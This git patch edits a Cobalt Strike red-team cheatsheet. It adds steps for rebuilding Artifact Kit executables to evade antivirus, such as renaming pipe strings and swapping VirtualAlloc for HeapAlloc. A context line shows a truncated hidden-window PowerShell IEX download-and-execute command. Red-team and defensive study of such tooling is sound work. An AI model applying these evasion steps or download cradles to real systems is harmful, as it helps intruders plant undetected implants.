From ba30618a8b00cea49eb4a5cb0cfd65f467407077 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Fri, 14 Feb 2020 17:10:00 +0100
Subject: [PATCH] Cobalt Strike - Artifact

---
 .../Cobalt Strike - Cheatsheet.md                      | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
index f74cd33..23aed9c 100644
--- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md	
+++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md	
@@ -34,7 +34,6 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
     * [Persistence Kit](#persistence-kit)
     * [Resource Kit](#resource-kit)
     * [Artifact Kit](#artifact-kit)
-* [TODO](#todo)
 * [References](#references)
 
 
@@ -384,6 +383,15 @@ Beacon Command Elevators
 
 > Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. The Artifact Kit build script creates a folder with template artifacts for each Artifact Kit technique. To use a technique with Cobalt Strike, go to Cobalt Strike -> Script Manager, and load the artifact.cna script from that technique's folder.
 
+Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
+
+- `sudo apt-get install mingw-w64`
+- Edit the Artifact code
+    * Change pipename strings
+    * Change `VirtualAlloc` in `patch.c`/`patch.exe`, e.g: HeapAlloc
+    * Change Import
+- Build the Artifact
+- Cobalt Strike -> Script Manager > Load .cna
 
 ## References